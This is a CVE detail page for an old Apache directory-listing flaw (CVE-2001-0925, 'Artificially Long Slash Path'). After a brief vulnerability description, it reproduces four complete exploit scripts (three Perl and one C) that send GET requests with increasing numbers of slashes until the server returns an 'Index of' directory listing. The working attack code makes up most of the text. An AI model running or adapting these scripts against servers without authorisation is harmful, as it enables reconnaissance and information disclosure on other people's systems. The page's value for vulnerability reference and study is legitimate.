CVE-2001-0925 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. #!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # then modified by Siberian (www.sentry-labs.com) # with more modifications by rfp (www.wiretrip.net/rfp/) # ########################################################################## use libwhisker; use Getopt::Std; # apache3.pl # this exploit was modified to use the libwhisker library, which gives # HTTP/1.1, proxy, and SSL support. Plus, small other changes. $|++; my (%hin,%hout,%args); print "Apache Artificially Long Slash Path Directory Listing Exploit\n"; print "SecurityFocus BID 2503\n\n"; print "Original exploit code written by Matt Watchinski (www.farm9.com)\n"; print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n"; print "Moved to libwhisker by rfp\n\n"; getopts("p:L:H:sP:R:h:",\%args); if($args{h} eq ''){ print 'Usage: ./apache3.pl <options>, where options:',"\n"; print '-h host host to scan (must be specified)',"\n"; print '-p ## host port (default: 80)',"\n"; print '-L ## low end/start of range (default: 1)',"\n"; print '-H ## high end/end of range (default: 8192)',"\n"; print '-P host HTTP proxy via host',"\n"; print '-R ## HTTP proxy port (default: 80)',"\n"; print '-s use SSL (can\'t be used with proxy)',"\n"; exit 0; } $low = $args{L} || 1; $high = $args{H} || 8192; &lw::http_init_request(\%hin); # setup our request hash $hin{'whisker'}->{'host'}= $args{h}; $hin{'whisker'}->{'port'}= $args{p} || 80; if(defined $args{s}){ $hin{'whisker'}->{'ssl'} = 1; if(defined $args{P}){ print "SSL not currently compatible with proxy\n"; exit 1; } } if(defined $args{'P'}){ $hin{'whisker'}->{'proxy_host'}=$args{P}; $hin{'whisker'}->{'proxy_port'}=$args{R} || 80; print "Using proxy host $hin{'whisker'}->{'proxy_host'} on "; print "port $hin{'whisker'}->{'proxy_port'}\n"; } &lw::http_fixup_request(\%hin); # fix any HTTP requirements for($c=$low; $c<=$high; $c++){ $hin{'whisker'}->{'uri'} = '/' x $c; if(&lw::http_do_request(\%hin,\%hout)){ print "Error: $hout{'whisker'}->{'error'}\n"; exit 1; } else { if($hout{'whisker'}->{'http_resp'} == 200 && $hout{'whisker'}->{'data'}=~/index of/i){ print "Found result using $c slashes.\n"; exit 0; } } print "."; # for status } print "\nNot vulnerable (perhaps try a different range).\n";

// source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. /* Program: apacheslash.c Original Date: 2-21-02 Version: 1.0 Platform: Linux (compiled on SuSE 7.3) c0der: st0ic site: www.fsix.net e-mail: [email protected] Revised: NONE thus far Description: This program tests an Apache installation for the "Apache Artificially Long Slash Path Directory Listing Exploit." See SecurityFocus.com BID 2503 - http://online.securityfocus.com/bid/2503 Compile: gcc apacheslash.c -o apacheslash Stuff: I know theres already 3 Perl scripts that test this bug out, but there execution time is horrible so I was bored and decided to recode it in C for execution speed sake. On my box, I think it took about 8 mins to send 1000 /'s to apache with apache2.pl. It takes about 2 seconds with this program. BTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT vulnerable :-). Check out the securityfocus.com BID 2503 to find out whats vulnerable and whats not. I also included the comments from apache2.pl exploit which was modified by Siberian of sentry-labs.com. Read below for the details: /************************************************* #!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # new modified code by Siberian (www.sentry-labs.com) # ######################################################################################## # # Note: This isn't the orginal exploit! This one was modified and partly rewritten. # # Changes: # # - help added (more user firendly :-) ) # - messages added # - exploit is now able to be executed on WinNT or 2k. # - uses perl version of BSD sockets (compatible to Windows) # # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some # of the code and made it esaier to use and cross platform compatible. # The old verion used a esaier but not that compaible way of socket stream communication. # Any network code was replaced by cross platform compatible BSD sockets. # (much better than any other stream method :-) ) # # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32) # # Original comment and source is attached below. # ######################################################################################## # # Name: Apache Artificially Long Slash Path Directory Listing Exploit # Author: Matt Watchinski # Ref: SecurityFocus BID 2503 # # Affects: Apache 1.3.17 and below # Tested on: Apache 1.3.12 running on Debian 2.2 # # Info: This exploit tricks apache into returning a Index of the a directory # even if an index.html file is present. May not work on some OS's # # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in # very specific cases would feed stat() a filename that was longer than # stat() could handle. This would result in a condition where stat() # would return 0 and a directory index would be returned instead of the # default index.html. # # Code Fragment: /src/main/http_request.c # if (strchr(new_file, '/') == NULL) { # char *udir = ap_make_dirstr_parent(rnew->pool, r->uri); # # rnew->uri = ap_make_full_path(rnew->pool, udir, new_file); # rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file); # ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ /* # if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part # rnew->finfo.st_mode = 0; # } # # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled # The directory must also have the following Options enabled: # Indexes and MultiView # Some OS's have different conditions on the number of character # you have to pass to stat to make this work. If stat doesn't # return 0 for path names less than 8192 or so internal apache # buffer checks will stop this exploit from working. # # Debian needed around 4060 /'s to make this work. # # Greets: Special thanks to natasha who added a lot of debug to apache for me # while i was trying to figure out what had to be enabled to make this # exploit work. Also thanks to rfp for pointing out that MultiView # needed to be enabled. # # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us> # Anne for being so sexy <I never though corporate espionage # would be so fun> # All my homies at farm9 # DJ Charles / DJ NoloN for the phat beats # Marty (go go gadget snort) # All my ex-bees # RnVjazpIaXZlcndvcmxk # # I think that wraps it up. Have fun. -----snip snip---- **************************************************/ #include <stdio.h> #include <string.h> #include <errno.h> #include <stdlib.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> char tmp[10240]; char output[10240]; char *get = "GET "; char *slash = "/"; char *http = " HTTP/1.0\r\n"; char *end = "\r\n\r\n"; int c, x; int port; int low; int max; int sockfd; int bytes_recieved; int count; char *addr; struct sockaddr_in dest_addr; struct hostent *he; void usage(char *ptr) { fprintf(stderr, "\n\t%s <-h host> <-p port> <-l LOW> <-m MAX>", ptr); fprintf(stderr, "\n\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\n", ptr); fprintf(stderr, "\n\tLOW is how many /'s to start with and MAX is how many /'s to end with.\n\n"); exit(1); } int main(int argc, char *argv[]) { printf("\n\t[ apacheslash.c ]"); printf("\n\t[ c0ded by st0ic ]"); printf("\n\t[ Fsix.Net ]"); printf("\n\t[ [email protected] ]\n\n"); while ( ( c = getopt(argc, argv, "h:p:l:m:") ) != -1) { switch(c) { case 'h': { addr = optarg; break; } case 'p': { port = atoi(optarg); break; } case 'l': { low = atoi(optarg); break; } case 'm': { max = atoi(optarg); break; } default: usage(argv[0]); } } if ( low > max || addr == NULL ) usage(argv[0]); if ( (he = gethostbyname(addr)) == NULL) { perror("gethostbyname"); exit(1); } dest_addr.sin_family = AF_INET; dest_addr.sin_addr = *( (struct in_addr *) he->h_addr); dest_addr.sin_port = htons(port); memset (&dest_addr.sin_zero, 0, 8); printf("\t\n....Working....\n"); while (low <= max) { count = low; bzero(tmp, sizeof(tmp) ); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1) { perror("socket"); break; } if (connect (sockfd, (struct sockaddr_in *) &dest_addr, sizeof(dest_addr) ) == -1) { perror("connect"); exit(1); } strcpy(tmp, get); /* copy the necessary slashes. */ for(x = 0; x < count; x++) strcat(tmp, slash); strcat(tmp, http); strcat(tmp, end); send(sockfd, tmp, sizeof(tmp), 0); bytes_recieved = 1; while(bytes_recieved > 0) { bytes_recieved = recv(sockfd, output, sizeof(output), 0); if ( (strstr(output, "Index of") ) != NULL) { printf("\n\tNumber of \"/\"'s required to generate a directory listing = %d\n", low); close(sockfd); exit(0); } } low++; close(sockfd); } printf("\nHost does not appear to be vulnerable. Maybe try some different numbers...\n"); return 0; }

source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. #!/usr/bin/perl # # farm9, Inc. (copyright 2001) # # Name: Apache Artificially Long Slash Path Directory Listing Exploit # Author: Matt Watchinski # Ref: SecurityFocus BID 2503 # # Affects: Apache 1.3.17 and below # Tested on: Apache 1.3.12 running on Debian 2.2 # # Info: This exploit tricks apache into returning a Index of the a directory # even if an index.html file is present. May not work on some OS's # # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in # very specific cases would feed stat() a filename that was longer than # stat() could handle. This would result in a condition where stat() # would return 0 and a directory index would be returned instead of the # default index.html. # # Code Fragment: /src/main/http_request.c # if (strchr(new_file, '/') == NULL) { # char *udir = ap_make_dirstr_parent(rnew->pool, r->uri); # # rnew->uri = ap_make_full_path(rnew->pool, udir, new_file); # rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file); # ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ # if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part # rnew->finfo.st_mode = 0; # } # # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled # The directory must also have the following Options enabled: # Indexes and MultiView # Some OS's have different conditions on the number of character # you have to pass to stat to make this work. If stat doesn't # return 0 for path names less than 8192 or so internal apache # buffer checks will stop this exploit from working. # # Debian needed around 4060 /'s to make this work. # # Greets: Special thanks to natasha who added a lot of debug to apache for me # while i was trying to figure out what had to be enabled to make this # exploit work. Also thanks to rfp for pointing out that MultiView # needed to be enabled. # # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us> # Anne for being so sexy <I never though corporate espionage # would be so fun> # All my homies at farm9 # DJ Charles / DJ NoloN for the phat beats # Marty (go go gadget snort) # All my ex-bees # RnVjazpIaXZlcndvcmxk # # I think that wraps it up. Have fun. # # Usage: ./apacheIndex.pl <host> <port> <HI> <Low> # Where: Hi and low are the range for the number of / to try # use IO::Socket; $low = $ARGV[3]; #Low number of slash characters to try $hi = $ARGV[2]; #High number of slash characters to try $port = $ARGV[1]; #Port to try to connect to $host = $ARGV[0]; #Host to try to connect to # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind [email protected] while($low <= $hi) { $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed"; $url = ""; $buffer = ""; $end = ""; $url = "GET "; $buffer = "/" x $low . " HTTP/1.0\r\n"; $end = "\r\n\r\n"; $url = $url . $buffer . $end; print $socket "$url"; while(<$socket>) { if($_ =~ "Index of") { print "Found the magic number: $low\n"; print "Now go do it by hand to to see it all\n"; close($socket); exit; } } close($socket); $low++; }

source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. #!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # new modified code by Siberian (www.sentry-labs.com) # ######################################################################################## # # Note: This isn't the orginal exploit! This one was modified and partly rewritten. # # Changes: # # - help added (more user firendly :-) ) # - messages added # - exploit is now able to be executed on WinNT or 2k. # - uses perl version of BSD sockets (compatible to Windows) # # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some # of the code and made it esaier to use and cross platform compatible. # The old verion used a esaier but not that compaible way of socket stream communication. # Any network code was replaced by cross platform compatible BSD sockets. # (much better than any other stream method :-) ) # # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32) # # Original comment and source is attached below. # ######################################################################################## # # Name: Apache Artificially Long Slash Path Directory Listing Exploit # Author: Matt Watchinski # Ref: SecurityFocus BID 2503 # # Affects: Apache 1.3.17 and below # Tested on: Apache 1.3.12 running on Debian 2.2 # # Info: This exploit tricks apache into returning a Index of the a directory # even if an index.html file is present. May not work on some OS's # # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in # very specific cases would feed stat() a filename that was longer than # stat() could handle. This would result in a condition where stat() # would return 0 and a directory index would be returned instead of the # default index.html. # # Code Fragment: /src/main/http_request.c # if (strchr(new_file, '/') == NULL) { # char *udir = ap_make_dirstr_parent(rnew->pool, r->uri); # # rnew->uri = ap_make_full_path(rnew->pool, udir, new_file); # rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file); # ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ # if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part # rnew->finfo.st_mode = 0; # } # # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled # The directory must also have the following Options enabled: # Indexes and MultiView # Some OS's have different conditions on the number of character # you have to pass to stat to make this work. If stat doesn't # return 0 for path names less than 8192 or so internal apache # buffer checks will stop this exploit from working. # # Debian needed around 4060 /'s to make this work. # # Greets: Special thanks to natasha who added a lot of debug to apache for me # while i was trying to figure out what had to be enabled to make this # exploit work. Also thanks to rfp for pointing out that MultiView # needed to be enabled. # # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us> # Anne for being so sexy <I never though corporate espionage # would be so fun> # All my homies at farm9 # DJ Charles / DJ NoloN for the phat beats # Marty (go go gadget snort) # All my ex-bees # RnVjazpIaXZlcndvcmxk # # I think that wraps it up. Have fun. # # Usage: ./apacheIndex.pl <host> <port> <HI> <Low> # Where: Hi and low are the range for the number of / to try # #use IO::Socket; # #$low = $ARGV[3]; #Low number of slash characters to try #$hi = $ARGV[2]; #High number of slash characters to try #$port = $ARGV[1]; #Port to try to connect to #$host = $ARGV[0]; #Host to try to connect to # # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind [email protected] # #while($low <= $hi) #{ # #$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed"; # # $url = ""; # $buffer = ""; # $end = ""; # # $url = "GET "; # $buffer = "/" x $low . " HTTP/1.0\r\n"; # $end = "\r\n\r\n"; # # $url = $url . $buffer . $end; # # print $socket "$url"; # while(<$socket>) # { # if($_ =~ "Index of") # { # print "Found the magic number: $low\n"; # print "Now go do it by hand to to see it all\n"; # close($socket); # exit; # } # } # # close($socket); # $low++; #} use Socket; print "Apache Artificially Long Slash Path Directory Listing Exploit\nSecurityFocus BID 2503\n\n"; print "original exploit code written by Matt Watchinski (www.farm9.com)\n"; print "rewritten and fixed by Siberian (www.sentry-labs.com)\n\n"; $host = shift || 'localhost'; #Host to try to connect to $port = shift || '80'; #Port to try to connect to $hi = shift || '100'; #High number of slash characters to try $low = shift || '0'; #Low number of slash characters to try if(($host eq 'localhost') && ($port eq '80') && ($hi eq '100') && ($low eq '0')) { print 'Usage: ./apache2.pl <host> <port> <HI> <Low>'; print "\nHi and low are the range for the number of \/ to try\n"; exit 0; } print "\ntarget: $host"; print "\nport: $port"; print "\nhi: $hi"; print "\nlow: $low\n\nStarting attack...\n\n"; # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind [email protected] $url = ""; $buffer = ""; $end = ""; #$port = (getservbyname($port, 'tcp') || die "No port!"); $iaddr = inet_aton($host); $paddr = sockaddr_in($port, $iaddr) or die "Faild ... SOCKADDR_IN!"; $proto = getprotobyname('tcp'); while($low <= $hi) { socket(SOCKY, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(SOCKY, $paddr ) or die "connect: $!";; $url = "GET "; $buffer = "/" x $low . " HTTP/1.0\r\n"; $end = "\r\n\r\n"; $url = $url . $buffer . $end; print "."; send(SOCKY,$url,0) or die "send: $!";; while((recv(SOCKY,$out,1,0)) && ($out ne "")) { if($out eq "I") { recv(SOCKY,$out,1,0); if($out eq "n") { recv(SOCKY,$out,1,0); if($out eq "d") { recv(SOCKY,$out,1,0); if($out eq "e") { recv(SOCKY,$out,1,0); if($out eq "x") { recv(SOCKY,$out,1,0); if($out eq " ") { recv(SOCKY,$out,1,0); if($out eq "o") { recv(SOCKY,$out,1,0); if($out eq "f") { print "Found the magic number: $low\n"; print "Now go do it by hand to to see it all\n"; close(SOCKY); exit 0; } } } } } } } } } close(SOCKY); $low++; } print "\n\nNot vulnerable :-(\nCheck some other numbers.\n";